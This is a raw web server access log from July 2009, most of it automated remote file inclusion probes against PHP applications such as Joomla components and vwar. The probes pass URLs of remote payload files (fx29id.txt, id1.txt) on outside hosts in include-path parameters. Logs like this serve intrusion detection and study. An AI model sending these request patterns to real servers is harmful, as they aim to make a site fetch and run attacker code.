92.48.127.79 - - [10/Jul/2009:04:14:26 -0400] "GET /logs/access_log.Q109053100//zb41/include/write.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:14:33 -0400] "GET /logs/access_log.Q109053100//zb41/include/write.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
65.23.158.226 - - [10/Jul/2009:04:14:42 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.158.226 - - [10/Jul/2009:04:14:42 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.158.226 - - [10/Jul/2009:04:14:42 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
65.23.158.226 - - [10/Jul/2009:04:15:17 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
92.48.127.79 - - [10/Jul/2009:04:15:22 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:15:22 -0400] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:15:22 -0400] "GET /logs/access_log.Q109051900//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:15:28 -0400] "GET /logs/access_log.Q109062800//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:15:33 -0400] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:15:33 -0400] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:15:33 -0400] "GET /logs/access_log.Q109051900//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:15:40 -0400] "GET /logs/access_log.Q109062800//bbs//skin/zero_vote/ask_password.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:06 -0400] "GET /?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:06 -0400] "GET /?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:06 -0400] "GET /logs/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 8922 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:06 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:06 -0400] "GET /logs/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 8922 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:06 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:16 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:16 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:17 -0400] "GET /?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:18 -0400] "GET /logs/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 8922 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:18 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:18 -0400] "GET /?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:19 -0400] "GET /logs/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 8922 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:19 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:26 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:16:28 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:16:39 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:16:40 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:16:47 -0400] "GET /logs/access_log.Q109062000%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
91.121.5.55 - - [10/Jul/2009:04:16:52 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.5.55 - - [10/Jul/2009:04:16:52 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.x-pronet.com/board/forum/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:16:53 -0400] "GET /gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:16:53 -0400] "GET /logs/access_log.Q109051100/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:16:53 -0400] "GET /logs/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:16:56 -0400] "GET /logs/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:16:56 -0400] "GET /gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:16:56 -0400] "GET /logs/access_log.Q109051100/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:17:06 -0400] "GET /logs/access_log.Q109052200/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:17:06 -0400] "GET /logs/access_log.Q109052200/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:17:19 -0400] "GET /logs/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:17:19 -0400] "GET /logs/access_log.Q109051100%20%20/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:17:22 -0400] "GET /gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:17:25 -0400] "GET /logs/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:17:25 -0400] "GET /logs/access_log.Q109051100%20%20/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:17:25 -0400] "GET /gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:04:17:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.13.191.186 - - [10/Jul/2009:04:17:37 -0400] "GET /logs/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:17:37 -0400] "GET /gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:17:37 -0400] "GET /logs/access_log.Q109051100/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:17:37 -0400] "GET /logs/access_log.Q109052200%20%20/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:17:38 -0400] "GET /logs/access_log.Q109052200%20%20/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:18:00 -0400] "GET /logs/access_log.Q109052200/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:18:15 -0400] "GET /gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:18:15 -0400] "GET /logs/access_log.Q109051100/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:18:15 -0400] "GET /logs/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
65.23.158.226 - - [10/Jul/2009:04:18:16 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.23.158.226 - - [10/Jul/2009:04:18:16 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
65.23.158.226 - - [10/Jul/2009:04:18:16 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.13.191.186 - - [10/Jul/2009:04:18:17 -0400] "GET /gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:18:17 -0400] "GET /logs/access_log.Q109051100/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:18:17 -0400] "GET /logs/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:18:43 -0400] "GET /logs/access_log.Q109052200/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
65.23.158.226 - - [10/Jul/2009:04:18:43 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
83.13.191.186 - - [10/Jul/2009:04:18:46 -0400] "GET /logs/access_log.Q109052200/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:18:55 -0400] "GET /logs/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:18:55 -0400] "GET /gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:18:55 -0400] "GET /logs/access_log.Q109051100/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
83.13.191.186 - - [10/Jul/2009:04:19:21 -0400] "GET /logs/access_log.Q109052200/gzip=0&file=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:20:02 -0400] "GET /logs/access_log.Q109051200%20%20//zb41/include/write.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:20:06 -0400] "GET /logs/access_log.Q109053100%20%20//zb41/include/write.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:04:21:28 -0400] "GET /logs/access_log.Q109052000//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
205.234.187.238 - - [10/Jul/2009:04:21:28 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.811"
205.234.187.238 - - [10/Jul/2009:04:21:28 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.811"
205.234.187.238 - - [10/Jul/2009:04:21:37 -0400] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:04:21:37 -0400] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:04:21:38 -0400] "GET /logs/access_log.Q109052000//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:21:41 -0400] "GET //components/com_simpleboard/file_upload.php?sbp=http://aboutav.com//id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:21:41 -0400] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://aboutav.com//id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:21:41 -0400] "GET /logs/access_log.Q109060300%20%20//components/com_simpleboard/file_upload.php?sbp=http://aboutav.com//id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:21:44 -0400] "GET /logs/access_log.Q109061300%20%20//components/com_simpleboard/file_upload.php?sbp=http://aboutav.com//id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:04:21:46 -0400] "GET /logs/access_log.Q109070300//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 260 "-" "libwww-perl/5.811"
88.191.37.60 - - [10/Jul/2009:04:22:03 -0400] "GET /logs/access_log.Q109070300////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:22:03 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 200 8929 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:22:04 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:04:22:04 -0400] "GET /logs/access_log.Q109070300//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:04:22:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.124.127.34 - - [10/Jul/2009:04:22:40 -0400] "GET /logs/access_log.Q109062000//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:23:10 -0400] "GET /logs/access_log.Q109051200%20%20//zb41/include/write.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:23:14 -0400] "GET /logs/access_log.Q109053100%20%20//zb41/include/write.php?dir=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:04:23:15 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:04:23:15 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:23:16 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:23:16 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.78.116.209 - - [10/Jul/2009:04:23:31 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://planetfallhosting.com/files/1? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.78.116.209 - - [10/Jul/2009:04:23:31 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://planetfallhosting.com/files/1? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.78.116.209 - - [10/Jul/2009:04:23:31 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://planetfallhosting.com/files/1? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:04:23:34 -0400] "GET /logs/access_log.Q109052000%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
205.234.187.238 - - [10/Jul/2009:04:23:46 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.cotrimex.com.br/imagens/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:24:04 -0400] "GET /?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:24:04 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:24:04 -0400] "GET /logs/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 8922 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:24:05 -0400] "GET /?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:24:05 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.236.242.164 - - [10/Jul/2009:04:24:05 -0400] "GET /logs/?sourcedir=http://www.petechnologies.net///id1.txt? HTTP/1.1" 200 8922 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:04:24:26 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:24:40 -0400] "GET /logs/access_log.Q109070300%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:04:24:54 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.78.116.209 - - [10/Jul/2009:04:25:19 -0400] "GET /logs/access_log.Q109060200//modules/vwar/admin/admin.php?vwar_root=http://planetfallhosting.com/files/1? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:25:25 -0400] "GET /logs/access_log.Q109060200%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
65.55.105.232 - - [10/Jul/2009:04:25:36 -0400] "GET /images/ACE_RCM_info.pdf HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
88.191.37.60 - - [10/Jul/2009:04:25:41 -0400] "GET /logs/access_log.Q109070300%20%20////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:26:22 -0400] "GET /logs/access_log.Q109062200%20%20////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:04:26:22 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
59.22.140.17 - - [10/Jul/2009:04:26:59 -0400] "GET /logs/access_log.Q109053000%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:27:29 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:04:27:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.37.60 - - [10/Jul/2009:04:27:48 -0400] "GET /logs/access_log.Q109060300//components/com_simpleboard/file_upload.php?sbp=http://aboutav.com//id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:27:51 -0400] "GET /logs/access_log.Q109061300//components/com_simpleboard/file_upload.php?sbp=http://aboutav.com//id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:28:07 -0400] "GET /logs/access_log.Q109053000%20%20//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
88.191.37.60 - - [10/Jul/2009:04:28:50 -0400] "GET /logs/access_log.Q109062200////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:29:01 -0400] "GET //?commonpath=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:29:01 -0400] "GET /logs//?commonpath=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 200 8927 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:29:01 -0400] "GET /logs/access_log.Q109062600//?commonpath=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:29:01 -0400] "GET /logs/access_log.Q109060100//?commonpath=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
91.121.89.135 - - [10/Jul/2009:04:29:10 -0400] "GET /logs/akocomments.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
91.121.89.135 - - [10/Jul/2009:04:29:10 -0400] "GET /akocomments.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.121.89.135 - - [10/Jul/2009:04:29:10 -0400] "GET /logs/access_log.Q109063000/akocomments.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:29:58 -0400] "GET //?commonpath=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:29:58 -0400] "GET /logs/access_log.Q109062600%20%20//?commonpath=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:29:58 -0400] "GET /logs//?commonpath=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 200 8927 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:29:58 -0400] "GET /logs/access_log.Q109060100%20%20//?commonpath=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.89.135 - - [10/Jul/2009:04:29:59 -0400] "GET /logs/access_log.Q109051400/akocomments.php?mosConfig_absolute_path=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
92.48.127.79 - - [10/Jul/2009:04:30:00 -0400] "GET //?commonpath=http://www.layoutscene.com/Games/thumbs/fx29id.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
